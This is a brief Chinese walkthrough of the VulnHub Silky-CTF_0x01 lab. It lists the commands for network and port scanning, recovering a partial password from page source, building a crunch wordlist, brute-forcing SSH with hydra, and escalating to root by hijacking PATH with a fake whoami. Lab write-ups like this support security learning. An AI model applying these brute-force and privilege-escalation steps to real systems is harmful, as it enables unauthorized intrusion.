本周实践的是vulnhub的Silky-CTF_0x01镜像,
下载地址,https://download.vulnhub.com/silky/Silky-CTF_0x01.ova,
用virtualbox导入成功,
做地址扫描,sudo netdiscover -r 192.168.0.0/24,
获取到靶机地址是192.168.0.187,
接着做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.0.187,
浏览器访问http://192.168.0.187/robots.txt,
浏览器访问http://192.168.0.187/notes.txt,
在线翻译提示隐藏了两个字符的密码,
浏览器访问http://192.168.0.187并查看源码,
点击script.js,获取到隐藏了两个字符的密码s1lKy,
制作一个密码字典,crunch 7 7 -t s1lKy^% >> pass.txt,
进行ssh暴破,hydra -l silky -P pass.txt 192.168.0.187 ssh,
登录靶机,ssh [email protected],
查看root权限程序,find / -perm -u=s -type f 2>/dev/null,
查看内容,strings /usr/bin/sky,获取到调用了whoami,
制作一个新的whoami,cd /tmp,echo '/bin/sh' > whoami,
chmod 777 whoami,export PATH=/tmp:$PATH,
执行/usr/bin/sky,获取到新的shell,id确认有root权限,
原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之Silky-CTF_0x01的实践
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论